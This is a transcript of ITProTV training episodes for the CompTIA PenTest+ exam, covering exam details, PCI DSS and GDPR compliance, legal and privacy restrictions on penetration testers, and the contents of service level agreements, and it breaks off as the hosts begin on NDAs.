CompTIA PenTest Plus show right here on ITProTV. That's right, we're about to dive into this, and I'm going to be your host, Ronnie Wong, and I'll also, of course, be joined by our subject matter expert, Mr. Daniel Lowry. Now, this is a chance for us to introduce ourselves, so I'm going to go ahead and take that chance, and then I'll turn it over to you, Daniel.
Sounds good.
All right, so let me go ahead and introduce myself. I'm Ronnie Wong, one of the educators here at ITProTV, and I will be your host throughout this entire series on PenTest Plus, and I do have several security certifications that are more blue team focused, and so this actually gives me a chance to go ahead and begin to learn a little bit about the red team side as well. So with my experience and background, that actually allows me to kind of fill that out a little bit more, but as well, hopefully to ask some questions that you might ask, as well as actually kind of bring in a little bit more blue team to ask those types of questions as well. Now, I'm going to turn it over to our SME to introduce himself, Mr. Daniel Lowry. Go ahead and introduce yourself, Ronnie.
Thank you, Ronnie. I'm Daniel Lowry. I'll be your SME for this lovely little PenTest Plus series that we're putting on for you. Hopefully you enjoy this. A little bit about myself. I've worked in IT for over 20 years now. I can't believe it's been that long. And in that time, I've gathered a few certs underneath my belt as well, both on the blue team side of things and the red team side, as well as systems administration, network administration, operations, things of that nature. I do have a passion for the red teaming that's out there, penetration testing, vulnerability testing, really exciting. I like that stuff, so I'm looking forward to getting into this series with you folks out there and teaching you some of the really cool stuff that goes along with the idea of penetration testing. PenTest Plus is a great resource for that, so we're going to get to look over a lot of interesting topics.
All right, now, Daniel, when it comes down to somebody watching the show, is there any background, prerequisite knowledge that they might need? And also, what are they really going to get out of the show?
Okay, good question. Now, I will say I will be assuming a level of knowledge from you as a learner out there, and that level of knowledge is going to be someone that is already familiar with operating systems such as Windows Server, Linux, and things of that nature. Right? So those two are going to be our two major operating systems. Mac OS is there, but it's basically Unix, so we'll just call it spade on that one. Other than that, I also need to know a bit about networking as well. I'm going to assume that you understand networking basics. So if you have those two prerequisites, you should do rather well throughout this. And what was your other question, Ronnie?
Yeah, the other question here has to do with the idea of what will they get out of this course as they watch it. We know it is course certification, but what else are they actually going to learn?
Yeah, so you definitely will be preparing for your certification exam, which will be PenTest Plus PT0-002 specifically. That's what the series is all about. But not only that, you're going to gain my insights and my experience. I'm going to hand that over to you as you watch throughout the series on not only the nuts and bolts on how things work when it comes to penetration tests, but also some of those caveats, those intangibles that come from just having done it and working with it. I'll be giving you that as well. So hopefully with those two things combined, not only will you be prepared to sit and succeed in your exam, but also take some real skill sets out and be successful in the business side of things.
All right, now, Daniel, I know that most people watching something like online training, they go, oh, it's just going to be a bunch of lecture. But Daniel, how are our episodes going to be structured out?
So our episodes will be structured out in a way where we're going to take specific topics and domains that are called out by CompTIA throughout their objective list, and we're going to chunk those up into bite-sized pieces where we can easily ingest those things. So take those different domains and learning how to scope, and then the hacking phases of this thing, actually doing the hacking stuff, and also talking about mitigations and after-action things. So we're going to kind of take this from soup to nuts, learn all there is to know about a typical pen test. I say all there is to know. Well, most of the things, the most common ideas that you'll encounter and procedures that you'll encounter as a pen tester, so that you are equipped to actually go out there and perform this duty as your job role.
Yeah, I believe that you actually have a whole list of different demonstrations you're actually using the tools on that will actually help us to cement that knowledge in place as well. So Daniel, most of the people that are watching this are probably going to be, of course, focused in on getting that certification. Can you help us out with some of the details?
Yeah, let's get a few of those cert details. I jumped into CompTIA's pen test page here, and it kind of gives you some information about it, and that's all great. You're probably already sold on this thing anyways while you're watching, so let's get down to the nitty-gritty on this, which is what's going on, what skills will you learn, right? Planning and scoping, we have information gathering, and vulnerability scanning, attacks and exploits, probably why you're here most of the time, right? It's the fun stuff, as I like to call it. Reporting, communication, tools, and code analysis as well. So good stuff that we're going to learn, as well as some of the job roles that you might operate under after obtaining the certification. So penetration tester, security consultant, cloud pen tester, web app pen tester, cloud security specialist, and network and security specialist. But here are the exam details specifically. We're going to hone in here on the PT0-002 side of things, which was made available on October 28th, 2021. CompTIA PenTest Plus will certify the successful candidate has the knowledge and skills required to plan, scope, penetration testing, including vulnerability scanning, understanding legal and compliance requirements. These are all very important things. Analyzing results and producing a written report with remediation techniques. Very comprehensive exam. We have a maximum of 85 questions. It is performance-based and multiple choice. If you've ever taken a CompTIA exam before you understand that's A, B, C, and D, or put this in the right order, select the correct attack that goes along with this. That's what they mean by performance-based. It is 165 minutes long. You need a passing score of 750 out of 900 to get the old win on this one. So that's a little high, but I believe you can do it. It can be done. So aim high. Recommended experience, kind of something we've already talked about. Net plus security plus corporate knowledge. Minimum 3 to 4 years hands-on information security or related experience. It's not required, but it is highly recommended. Otherwise, you're going to have a lot of backfilling to do, and it'll take a long time to get through this material. It is available in English and eventually Japanese. And then this is the big one right here, right? You can go to a Pearson VUE testing provider, either do it online or at a testing center, and it's $360 US. Oh, sorry, yes, thank you. $370 US. I don't know why I'm not said that, but there you go. Not too difficult or expensive for most people out there. I think that's a very reasonable price for this. There you go, some of the details around the exam itself.
All right, so what makes you excited about this course?
What makes me excited about this course is getting to talk about hacking stuff. I really enjoy doing that stuff. That really twirls my beanie, as it were. I enjoy doing that in my free time as well as my professional time. And then giving that to you folks out there is just fun to be able to talk about that. Having Ronnie here in the studio, we're gonna have some fun conversations. We're gonna hack some stuff. You're gonna see how to hack some stuff. We're gonna talk about the more administrative side of things as well, which is super important, which I'm glad that they bring in. So I think that PenTest Plus is one of the better certifications out there for those of you looking to get into the penetration testing field. It will do you well and serve you well as a certification in that space.
All right, well, there you heard it. And if you are ready to jump into PenTest Plus and have some fun with Daniel and myself as we actually get started, all it takes, of course, is the very next episode in this list. Regulation and compliance. That's right, welcome to PenTest Plus. I'm going to be here with Daniel Lowry as we get started taking a look here at the idea of compliance and regulation here. Now, Daniel, this seems like they actually have two different things that are really contrasting here. I want to do pen testing, but I also have to think about compliance and regulation. Tell us a little bit more.
I know, Ronnie, you think you wake up in the morning and go, I'm a pen tester, I'm going to be pen testing things.
Compliance,
hacking,
security.
Do I look like an ITIL person? No. But there are some definite compliance issues, regulations that we need to be aware of, and some specific things we're going to look at today in this episode that kind of control how we may or may not perform our duties as a penetration tester. So we need to be familiar with.
All right, so let's say that we came from the security plus where we already have a basic security background. We're starting into this, and we're now starting into this particular section here. Can you help us with a little bit of defining some of the terminology we're using?
I think that's a phenomenal idea, Ronnie. You're a master of the ceremonies here, so I will follow your lead. And yes, let's define what we mean when we say regulation and compliance. And it's pretty simple. I mean, you probably already have a basic idea in your head. What's going on? Let's just make sure we're all on the same sheet of music. A regulation is this is what you must do, or how you must do it. Compliance lets us know whether or not we did that correctly, or did we do it all, right? So regulation is telling us what we have to do, and compliance is whether or not we did the thing that we're supposed to do. So it's pretty simple.
Yeah, that sounds simple enough. Can you help us with some examples? What areas are we really specifically going to be looking into today?
Yeah, so today we're going to take a look at both PCI DSS and GDPR, because both of them are going to play a major role in a lot of our work as penetration testers. So those are two really good examples for what we need to know when it comes to compliance. Just give some use cases.
All right, Daniel, it's been a while since I've done security plus. You're going to have to remind me what those acronyms actually mean and help us out with where we specifically focus in on when it comes down to being a penetration tester.
All right, let's start off with PCI DSS. If you haven't heard this term before, welcome to the club. It's an interesting thing, and these are the governance and regulations surrounding the idea of the payment card industry. You reach in your pocket, you pull out a credit card or a debit card, any kind of card with numbers on it and security features and maybe even chip, right? When you make a payment with said card, the person that's processing that payment should be following the PCI DSS standards and regulations for processing said payment, and those are built to keep us safe, right? They want to increase security controls around the card payment industry as to reduce the amount of credit card fraud or debit cards that we encounter on a daily basis. So this is a really good thing. Let's get acronyms too, by the way. I think Ronnie's like chomping at the bit for that. I can't blame him. So PCI, payment card industry. DSS is going to be data security standard. Right? I got that right? Yeah, horrible with acronyms. So throughout the series, you're like, Daniel, come on, man. It's kind of the thing. I know, right? Well, I took the test and I passed it, so hopefully I'll get you there as well. I memorized them enough to get through the exam. That's where we need you to get folks up there. So that's what that's going to be. PCI DSS, payment card industry, data security standard. All right. Now, a couple things that I'm just going to kind of, I don't know whether or not you need to know them per se, but it does give you an idea around what what that might look like. If I'm a penetration tester and I am maybe courting a client that does payment card industry processing, how's that going to look for me being PCI DSS compliant during that thing, right? During that time. So a couple things you need to look at. There's a couple of things like merchant levels. This is what the PCI DSS basically is defining the size of your organization. And based off of the size of your organization is going to regulate what you need to do as far as security compliance goes, how assessments should look, what are you required to do, and what can you do not do. Okay. So let's they call them merchant levels. There are 4 merchant levels, and we'll start with merchant level 4 because that's actually the bottom of the row. Okay, this is the smallest of the merchant levels. Pretty quickly, they are less than 20,000 annual transactions. But it does seem small. Yeah. Ronnie, how many transactions are you processing?
No, I keep thinking about it. Like, I think I use my card like multiple times a day. It could be, it's less than 20,000. So it could be thousands if I think about it. It's possible.
I mean, that's just what I do. Right. But unfortunately, unless you're using like a tile, but if you're a small merchant, like if you have like an Etsy store or something like that, this may be, and you were taking payments, and you were the one processing those payments, not using a vendor, you don't have to worry about this, right? But the cool thing about this is you can do a self-assessment questionnaire or a SAC. Okay. Right. So Ryan will fill out this questionnaire as a payment card industry processor, and that would be enough to as a security assessment for him. Okay. So we move on to level 3. Let's take a look at that. So level 3 is between 20,000 and 1 million annual transactions. Kind of level 1 just here, right? Very cool. That's fine. Interesting. Obviously, a bit more rigorous. And let's see what they have for. You'll need to be able to fill out a SAC, the SAQ, and then you'll need quarterly network scans by approved scan vendors. ASVs.
All right. What the heck is that?
Right. Well, this kind of comes to where we come into play.
Oh, okay.
Right?
Right.
Oh, well, who's an approved scan vendor? So if you want to work in the PCI DSS industry, you want to be able to service them, you very well may need to be put on a list of approved scanning vendors. Right. That's what we're going to look out for. Right. So then there's attestation and compliance form that you might need to fill out. Again, this is all on their side of the fence, but this is what's being regulated. This is all about compliance and regulation. Right? If you're in this world, these are the things you're going to be aware of. Let me back this up. Approved scan vendors might actually be the tools themselves that you use. Okay. So who creates that tool is approved for scanning, and the output generated by that will be acceptable by the PCI DSS.
So if we have to use another tool, probably not a good idea.
You got it, right? Because I'm getting the two confused. I always do, and this, I don't want you to make the same mistake as Daniel does. Do as I say, not as I do. Right? Approved scan vendors are going to be those devices. Are they approved by that? Then you also have the qualified security assessors, which is what I'm always. If you're a qualified security assessor, that's where you get a list where you're able to process these payments or not payments. Yes, to do this, right? So let's move on to level 2, which is between 1 and 6 million annual transactions. My goodness, a bit of a large company. And cool thing is, the compliance for them is the same as level 3. So ladder repeat. I don't know why they make a distinction at that point. There's got to be some other differentiations.
Business, differentiation.
Probably not involving a whole lot of the
compliance
part of assessments. I would assume that's the case. Right, so that leaves us with level 1 with the bullets. This is over 6 million transactions annually. You're a big dog on the block. You do a lot of payment transactions. So for you, it's going to be a little more rigorous when it comes to your compliance for the regulation of PCI DSS. So what is that going to involve? Quarterly network scans for the ASV, attestation of compliance has to be filled out, as well as annual report on compliance with the ROC. Right? And this is done by qualified security assessors. Right? Lots going on. All that said, there's a lot of detail in there. I don't do payment card industry processing. Neither do you probably don't as well. But knowing a little bit about their industry could be pretty helpful to you as an assessor. Knowing that, maybe I need to be a qualified assessor. Maybe I need to be, or make sure that my tools and that myself is an ASV, right? So that I have all my ducks in a row if I want to service in that industry. These are things that are going to be stuff you have to understand and think about if you're going to be penetration testers and if we're going to go to that sphere, if you want yourself open to working in that area. Make sure you know stuff.
Yeah, it seems like that the higher we go in those levels, the more assessments or the more qualification that there may be for us to try and get more access into that type of work instead of just reviewing a form that we might have to fill out and just saying we're using the proper tools. Now we get up that level 1, we're actually having to qualify a bit more to say that we can do that. So this industry, very specific, but you can actually figure out why this is handling so much money for so many different people that it may be something that we really want to focus in on and understand those a little bit better. Now, that's super general, super specific. Is there something more general that we can have an example of?
General? No, I don't think there is, honestly. And it's actually quite the opposite way. Okay. Where there is very specific things. And I did the paper for you out there, and I found the PCI DSS documentation, so we can take a look at that and see what those specifics are. Here it is right here. Don't worry, there will be links in show notes for you to folks out there. Right, so you can enjoy this well. I found this here, and actually a lot of PCI DSS documentation will be found at this link right here, again, which will be in our show notes. And I just click the PCI DSS standard. Of course, you can see there's lots of interesting things, summaries of changes, prioritization approach for PCI DSS, reference guide. These are all really good things that we can make that a little larger for everybody. Great documentation out here, because that's absolutely necessary. You gotta have that going on. All right, so let's look at this doc, PCI DSS. What we need to concern ourselves about mostly, like, honestly, a lot of that stuff that I was telling you about earlier may or may not be relevant to us as testers, but giving us just a little insight into the world. What we need to know is what does an assessment look like, right? And that is under requirement number 11, regularly test security systems and processes. So click on that, it'll take us to this, and this will give us those details that we need about, well, what does that look like? What is required, and how can we make sure that we are compliant with what is required? So it lays out the requirements, tells it what goes on inside those test procedures, and then it even gives you some guidance. Make sure that you're getting it done the way they expect it to be done, so you get the output you're looking for, so that you can check the compliance box, because that's going to be a lot of your business as a pen tester. Some people check compliance boxes.
Yeah, no, it really is at least helpful that they put out this type of guidance for you. If not, you're kind of just shooting in the dark, hoping you're actually getting all things right.
It's like, okay, I think this will be good. You know, no, here's what I need you to do, and that's great because then you're not wasting your time doing things that don't need to be done, and you're focusing your time and efforts on things that absolutely need to be done, and you can verify whether or not you did them correctly because they give you all guidance. That's enough. So great stuff. So it's a pretty lengthy section. So you just looking first from here, implement process to test for the presence of wireless access points. Hey, you know about that, right? Wireless access points. There are insecurities with wireless, and detect and identify authorized and unauthorized wireless access points on a quarterly basis. Remember we talked about those quarterly network scans? Hey, this right here, right? That's what we're looking at. Some great notes about that. Testing procedures like examine policies and procedures to verify that processes are defined for detection and identification of authorized, unauthorized wireless access points, and then subpoints wireless LAN cards and system components, portable mobile devices attached to systems to create wireless access points. Thinking of tethering kind of idea, right? To your mobile device, wireless devices attached to network ports or network equipment. So again, going around, you know exactly what to look for, so that you can check the boxes. Great guidance here. So check this document out. It's going to be helpful for you if you work in PCI DSS.
All right, so I know in the last few years or so, Daniel, the idea of regulation and compliance, we've heard that terminology that you mentioned at the beginning, GDPR. Help us out. Where does this in pen testing kind of fit in?
So if you're going to engage with a client who has dealings in the EU, well, GDPR is going to definitely be something you need to be aware of. Now, they're pretty vague on as far as their specifics, but it does give some kind of guidance when it comes to what's lawful and what's unlawful. Obviously, that would definitely be of interest to us, right? Very important piece of the puzzle. But the GDPR is the General Data Protection Regulation. If you're not familiar with that acronym, now you are. If you're like me, be good at acronyms and memorize those things. But specific things we want to take a look at here is going to be Articles 32 and 35 specifically. And I wonder if I can find this. I got the GDPR up here really quickly. Oh yeah, so it does give you over on the table of contents. It's going to be here in Chapter 4 under Control and Processor, and then we can just find Article 32, Security of Processing. Click on that link. That will take you here, which kind of starts talking about taking into account state of art, cost optimization, nature, blah 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 blah. What I thought was interesting was a process for regularly testing, assessing, and evaluating the effectiveness of technical and organizational measures for ensuring the security of the processing, i.e., testing, right? Security assessment. assessment testing. That's what we're talking about. So there will be organizations that you engage with that work in EU or are stationed in the EU or have business going through EU systems that very well may need to become compliant. To do so, they're going to need a test. That's where you come in, right? You're the pen tester. Hey, to the rescue, right? That's why we like this job. It's going to be a lot of fun. Now, again, doesn't really go too deep in the weeds as far as like specifics on what you would have to do or not do. Just that the test must be done. Okay, and sometimes that's what it boils down to. And it can vary. When we're looking at this, we could be looking at Sarbanes-Oxley. That's another type of compliance regulation, right? We follow their regulations. That's the industry you're going to be working in. So you just got to know these are just good examples. They call these out specifically on the PenTest Plus objectives. So if you're looking at those objectives, you'll see these two specifically called out, which is why we're taking a look at them today. But there you go. Article what was it 32 and then there was 35. Data protection impact assessment. Right, there's an area here that talks about carrying out an assessment. I think it's up here in like the first area. Oh yeah, there we go. Carry out an assessment of the impact of the envisaged, I love that word, the envisaged operations on protection of personal data. Again, going toward the idea of there must be some sort of assessment and impact that will occur if something bad happens. So some organizations are going to be held to these regulations. They're going to need to engage with you. You're going to know how to engage with them, what exactly they need, so that you can help them be in compliance. So there you go. GDPR, pretty straightforward for what we need.
All right, Daniel, thank you again for actually helping us to at least get started here. Remember that you're actually training to be a pen tester and going after that PenTest Plus certification. This is the beginning here, and those two examples of using the PCI DSS as well as GDPR, these examples will help you get started and realize you're still going to have to do some regulation compliance as you become that professional pen tester. Well, that will wrap it up for our show today. There are more great episodes coming, so make sure you stay tuned for the very next PenTest Plus show. Can I get That's right, you have come to the PenTest Plus show, and we are here with Daniel Lowry as we begin actually.
That's me.
Oh, yeah. I was like, yeah. So we're actually here to talk about the idea of something which seems kind of strange, Daniel, once again. Restrictions, but I'm a pen tester. There should be no restrictions.
You would like to think that. That would be amazing. But that is not the case in almost every way.
Yeah. So, you mean, I can't just hack anything that I want to, just kind of get away with it? And
that's right. You can't just hack anything you like. There's called laws and whatnot that stop us. So interesting, right? Penetration testing is basically us doing criminal activity with hopefully permission, right?
Oh, yeah, that's true.
So there's, really, if I think about it that way, there's your first constraint, right? Permission. Permission, right? All right, we're going to start there. There's a couple of other different things that we need to be aware of in different areas that you may have just not thought about it in that way. So I want to make sure we focus a little bit on those areas, bring some light to them, and bring them to the forefront of your mind. So if you have questions about it, you can answer those, but you also understand this is the nature of the beast when it comes to performing penetration tests. There will be constraints, there will be limitations on what you can and cannot do, and for very good reasons. We'll discuss those as we go through this as well. And I'm trying to give you some resources to help you maybe get an idea of what those laws look like.
All right, so at the most general level, since we live right here in the United States, what are some of the things that we have to really worry about in terms of like a country level or something?
Okay, yeah. So yes, the countries themselves will have limitations because there are what's known as federal laws, right? Essays. And some of those federal laws include what is considered criminal activity. I'm not sure if you're aware of that, but yes, the federal governments of different countries out there have devised general and specific laws to determine whether or not you've done something wrong and whether or not sanctions will be brought against you. So we need to be aware of this because if we don't think of that beforehand, and we let's say Ronnie is my client, and he says, oh yeah, we're based in the US, but he has servers or satellite offices in the UK. How does that affect what I can and cannot do as a penetration tester? Are there laws in that area of the world that would dictate that I can or cannot do something? And if I can, what can I do? How can I do it? What are the constraints? You start to see the problem, right? So we need to be familiarized with that. Now on the PenTest Plus level, for the most part, we're talking general restrictions, right? There are obviously some specifics. Right now what we mean is you need to think about the idea that if I'm crossing borders or even within my own country, what are the laws that might say you can't do that? And if I do it, even if someone gave me permission, right? We got to discuss that idea for a second. Well, I still broke my law, and I'm going to be culpable for that. I'm going to have to send for the magistrate until I explain myself.
So this actually seems a little bit, it can be confusing because things are constantly changing. As an attack happens, all of a sudden the government says, hey, we're going to implement more restrictions and more regulations. But we have to keep on top of this.
We absolutely do. And one of the things that came to the forefront of my mind on this was the UK, right? The UK has recently made a change and added some interesting verbiage into what they consider cybercrime and whatnot. So let's jump in here. I've got this legislation up. Yes, these cookies are okay. Always asking me about cookies. Yes,
this is GDPR.
My goodness. Right. So we got the Computer Misuse Act of 1990, which has recently been updated. As you can see that right here, I think it says there are currently no known outstanding effects for the computer. There's I think this October 2021. They, like seriously recently updated this. And there was some interesting stuff in here that talked about what was it? A person is guilty of an offense if he obtains any. And then starts asking about an article intending to use command. It's talking about tools that are known to be used by hackers. If I obtain it with the intent to distribute or to use myself, I could be in violation of law. Guess what penetration testers do? They use a lot of the same tools that attackers use because they're simulating that effect. We want to see whether or not that threat actor would have any kind of movement toward their goal using said tool. Well, if I want to simulate that, I'm going to do the same kind of thing. Is the law going to cause me trouble if I use those tools in the environment? Yes. Or I say this is specifically going to use the UK specifically. Right? So we want to be aware of whether or not our country that we're working in, and make sure you know what those countries are before you start doing stuff, and you understand what those laws are before you engage in that activity. That are there constraints that must stop you from doing so.
Well, and the same, because I think you kind of hit on this as well, that there are tools that we may also be limited in our restrictions to as well, right?
Yes, absolutely. And not just through legal requirements. This might just be, it's not a good idea to use that tool because it's known to break things. So there's going to be tool restrictions. And some of them come to the idea of the fact that they just don't apply to what it is that you're doing. So why would you need that? I'll restrict use that tool. That can make it a whole lot easier if we are under an actual attack during the penetration test, which does happen. If we see a tool being used that's out of scope of the allowed tools, well then we can say, well, either someone has violated the agreement that we were going to use that tool, or we're under attack for real. An attacker is using that tool. Right? So there will definitely be tool restrictions that you find yourself in, and these will be vetted out and put into the scoping and documentation. We'll get into more of the legal documentation that will go along with scoping and issuing things like SLAs. We'll get into more of that in another episode. We don't have time for that in this one, and it's not really want to focus on that stuff. But that's where you would find a lot of that verbiage. What can you and cannot use? Maybe your client doesn't have the risk appetite for you to use X, Y, or Z tool because it's known to be disruptive. Too disruptive. Well, what's too disruptive? That's a one size fits one kind of idea. Too disruptive for you might be just right for Ronnie. It might be not even a blip on my radar, right? So it's going to be up to each person's organization that they're engaging with. So you're going to have to make that decision with them, figure that out, and set that in stone. And
yeah, speaking of the idea of those regulations and some of the different things around there, we know that entire countries do have, of course, their federal types of regulations, but we might also end up finding out that a particular state, like here in the United States, that they may allow for some things that maybe another state doesn't, right?
That's absolutely right. In the United States, we have an interesting union of states, right? So we have a federal government, but we also have local laws. Which one takes precedence? Am I going to be in trouble if the federal government allows me to do that, but the state government says I can't, or vice versa, right? And then maybe even down to the local level. Is there even more constraints or less constraints? How does that work? Who do I need to be compliant with? Who do I need to worry about violating? Right? These are good questions and things we need to take a look at and be aware of. So if you're operating inside a certain state, make sure you are aware of their local and state regulations. So I do have some resources for that. Here's one of the best websites I've ever seen in my life. The design is amazing. Yes, I know Ronnie's going to squinting at the screen. Honestly, the verbiage here is not that important. What is important is they're trying to be a resource for you to say, hey, these are state hacking and computer security laws, and you can filter it in by state. We're in Florida, so I'll just put a plus sign, and it will start giving me the relevant information around cybersecurity, cybercrime legislation that is active in the state of Florida. So very important. Again, if I was in a specific county in Florida or underneath another type of local law, I would want to check those as well because we're not in the business of trying to break laws. I mean, we kind of are. We walk that back with permission. Yes, but with permission. And I'll bring up a little interesting use case on that here in just a minute, but that was definitely something. Another one, this was a little more official looking, computer crime statutes. Again, all these links will be in your learner resources, so don't worry if you're trying to, oh, it's a long URL. Yeah, it surely is. Ronnie loves long URLs.
I love them, especially when they wrap around like 9 times.
So that's fun, right? But there you go, some different states and some citations that are addressing hacking, and wow, that just turned into a crazy thing. I like that. Great site, guys. Really enjoy what you did there. I was trying to make it readable for people. We're just talking about what unauthorized access is, trespassing with and communicating with stored data, and so on and so forth. And then for a couple specific states, really calling out those codes so you know how to conduct yourself, what they consider to be illegal versus legal, so on and so forth. I think that's about. Oh, there's one more. Yeah, I thought it was really neat because New York has recently adopted, and this was a good example because they go into defining penetration testing specifically. Actually, they get into that conversation. Here's the New York State Department of Financial Services. It's called the 23 NYCR 500. For those of you keeping score, I think some of them. Cybersecurity requirements for financial services companies. So going back into the financial realm of things. What I love about it, like I said, if I do a little Control F and do penetration, you'll notice it gives that definition. Penetration testing means a test methodology in which assessors attempt to circumvent or defeat the security features of the information system by attempting penetration databases or controls from outside or inside the covered entity's information system. Excellent that they gave us this because now you know exactly, if you are working as a penetration tester, what that means as defined by the New York Code of Law when it comes to financial institutions. Right? You are working in a financial institution, that definition might not apply. Maybe it only applies to external tests. It doesn't apply to internal tests. You start to see the legalese that kind of comes out of these things and can make it really difficult for you to traverse those waters. Good legal counsel and legal console will be a good idea if you're going to become a penetration tester. So keep that in mind. There's actually a whole section here. Tells you what penetration testing means, and then here we go. Penetration testing and vulnerability assessments. Defining what that is, what that looks like, and the constraints around that. Right? What would stop you from can you do this? Can you not do that? This is going to help you try to figure out and traverse those waters. So really good information. I thought it was a great example of this. So if you want to see what that can look like, again, that'll be available in your resources.
Everything we've talked about so far, Daniel, has to do with really clear-cut, seems like guidelines, regardless of whether they're national or state or local, or even due to the idea the tools are actually available out there. But there is a whole realm of information that we also have to deal with as well, and where restrictions come in, which is dealing with privacy of information too. So what guidance can you give us on that?
Yeah, so you have to be aware of the fact that there are privacy laws that will governments and local governments, state governments, federal governments, and even within organizations, maybe they have policies and procedures around what they consider privacy. Right? And you want to maintain that privacy. You don't want to be the person that violates people's privacy because then you're going to get a lot of work, and rightfully so, because people like to privacy. And if we give you access into those things, well, then we're giving you a level of trust. Violate the trust, you are not going to be. You're going to be persona non grata in a lot of ways. So it's a really important thing. There are governing documents that will tell us what privacy means and all the minutiae around privacy in certain areas. First thing comes right out of my brain, so GDPR. We'll link that because it's really interesting documentation on and around privacy for the EU. But the United States has privacy issues or governments as well. I think of the California Privacy Rights Act. Pull that up for us right here, of 2020. It's basically GDPR, but at a state level. And if you want to do business with organizations that are in California, right, hence the name California Privacy Rights Act, then you're going to want to comply with this act. And I like the idea of privacy. I think this was a good thing. How about you, Ryan? Are you familiar with this one?
I'm not familiar with that particular rights act right there, but yeah, the idea of actually making sure that we understand that even if we're doing penetration testing, there are going to be clear guidelines to help us understand here is too far once you've gotten to this person's information, to do that. So I think all that's actually really good because if not the gray area now, you're trying to say, should I, shouldn't I? Right. And then what can you actually release, what can't you? All this actually is very helpful for the penetration tester to know whether they've gone too far.
Absolutely, right? It's that guiding star to say, if I do this attack technique, is there a possibility that would expose my client's privacy or private information, something sensitive? If there is, maybe I shouldn't do that. So you start to see that's what this whole episode has been around, is the idea that we do have constraints upon us as penetration testers as we work in engagements, and they're typically very good because we're not in the business, we're not attackers, right? We're not threat actors out there that don't care about X, Y, or Z. We do care about our clients. We want to help them increase their security, and we don't want to expose them and any private information, sensitive information. We want to stay away from that. So there are going to be just logical constraints, organizational constraints, and even governmental constraints that will stop us from doing certain activities, using certain tools that might be possible. So that's what this is all about. Hopefully, you got a lot of information about this. There you go. We do have restrictions. All right. Well, there's plenty of restrictions for us to actually consider in the episode that we just watched. Let's make sure we hit the key highlights just in case we forgot. Do not forget that when it comes down to, of course, the idea of restrictions that we deal with, a few limitations. The idea of few restrictions that are out there due to whether their particular use case of what actually you're doing or other things that are out there. Of course, state and local requirements we may find those different even within the country, as well as privacy requirements that are out there. All these are considerations. If you end up, of course, working as a penetration tester, you're going to end up in a company that's going to be keen on keeping focus on those restrictions. Because if not, you might actually end up somewhere you don't want to. They get nice shiny set of bracelets.
Yeah,
lovely something.
I didn't think about so many, so good reminder there.
Keep that in mind, right?
All right. Well, that's a good place for us to end this episode, but there are plenty more PenTest episodes coming up next. Thank you for joining us. Work through. Let's find out more about them next.
You're watching ITProTV.
That's right, legal concepts and other documentation that we don't expect if we're just trying to get into pen testing, but you definitely need to know because it may keep you out of trouble. And we have Mr. Daniel Lowry here, of course, to help guide us through some of the documentation things that it's easy to forget. Daniel, the excitement of saying, hey, I know what I want to do, I'll jump right into it, and then realize I could get in trouble for doing this, so I need some way of actually guiding through what needs to be done here.
Yeah, and you gotta remember, it's a business.
Yeah,
business. I think that's something that can easily fall by the wayside in the excitement of the actual work, what you're going to be doing, what you're going to be engaging in. And I get that. So, right, guilty as charged. Right. Oh, that sounds fun. Let's do that. No, we're talking about documents. I just want to hack them. I'm not how to do it, right? No. Yeah, Ronnie, I think you nailed it. You're nailing the head when you talk about how we don't really think about this a lot. I'm actually really impressed with you for making sure that they cover this in concept too, because that is an actual thing you will do as a pen tester. And it's actually a lot of what you want to be doing is putting documentation, putting out documentation, signing forms, making sure you have all the right pieces in place, and then you can go.
So this is actually really good, whether we're working, let's say, for an existing pen testing group, or we're starting our own. We need to know about this so that we can really get started in working as a business with another business, and that way we are on firm foundation.
Absolutely. These are important concepts and documents. So I said we're going to get the ball rolling. Okay. So there's a few of them we're going to go through, and these are going to be the common types of concepts and/or documents that you're going to see. Most of them are documents that are constantly behind them. So hence the idea of documents. Let's start off with an SLA. You've probably actually signed and agreed to an SLA before, right? Have you ever?
Yes. So when working with an MSP, or if you're working as someone that's contracting, the idea of actually having a service level agreement is really important to us because it actually does specify, like, hey, what I'm going to be responsible for. So that's my particular aspect of actually doing something like that. When actually helping out another company and saying, yes, I'm responsible for doing this, I'm responsible for doing this. Hey, that 24-hour agreement that I said, I don't want to be responsible for that at times.
Yeah. So and you bring a great point is the fact that you're going to be laying out in your SLA what services that you are going to be providing, right? So it's an important part of service level agreement, and to what level that service will be provided, right? So that's the why you get that whole SLA nomenclature. But it's funny, it doesn't just dictate what the penetration tester is going to do, right? But also the responsibilities of the client. They have responsibilities as well. If you've ever signed up for cloud infrastructure, right? There's an SLA there. We will provide you a certain level of cloud infrastructure and/or service, but you as a customer will also make sure that X, Y, and Z is true, right? These are the ideas that go on. A couple of things. So the services will be defined. We also like to make them measurable. So when we set expectations, have to be able to say, I met the idea that we performed 24-hour service, that you had available service for that period of time, right? So measurable expectations need to be set in SLA. Also, sanctions and reparations for when violations occur, right? Also remediation. So walk it back. If I do make a mistake, or if you make a mistake of my client. How do we fix that? How do we get back to a happy place? Right? So this is all going to be SLA protocols and process for adding and removing these. Right? Because remember, you're going to be going at your best guess out of the gate, and then once you get into the weeds, you're like, we did not account for this. We need to get into the to make sure that our client is getting what they want, and that we have value they're asking for. So important stuff that goes around that. I did find an example of SLA so that we can, yes, and again, this is just, it's not a one-size-fits-all thing. I just like, hey, any SLAs out there I can use as an example for you folks out there. So I found one, ProNet Solutions. This is a ProNet penetration testing service agreement in terms of service. It explains what that is, and you'll notice there's going to be a lot of interesting things about this. Now, again, this is all generalizations. This is a lot of times you'll see all this wrapped up in one big document. A couple of these other documents we're going to talk about, you'll see them in one, or they'll be teased out into multiple different documents, or maybe a few of them are combined into multiple. You get the idea. But being familiar with what typically goes in what type of document and the nomenclature for that is what we're trying to accomplish today. So this one talks about the penetration testing service, what that is, defining that, the fees, the billing, the payment, how that works out, right? To support your responsibilities as the clients, some of the requirements, right? You warrant that you have legal right to subject target systems to the service, and that if you are not the owner of target systems, then that you have obtained such a right from the legal owner of target systems. So again, going the idea of just because somebody gave you permission doesn't mean they have the right to give you permission. So they're verifying as a responsibility in the SLA that they do have the right to give you permission. If they don't, well, then that's not on you, right? Of course, it's not verified that they have the right. It gets fun real quick. You start seeing the these. But this is a really good document. Kind of walks through very much of the concepts that we were just discussing and what goes into an SLA. Very cool stuff.
Yeah, with that idea of the SLA, a lot of that comes down to, businesses as they do that, they have to have that measurable, document that they can point back to. If there's ever a dispute, they know exactly what's going on here and what the responsibilities are. So it does help with that. Now, the other thing that we also want to talk about here, of course, is the realm of using what we call NDA. Now, that's kind of a weird term here. What does that really mean?
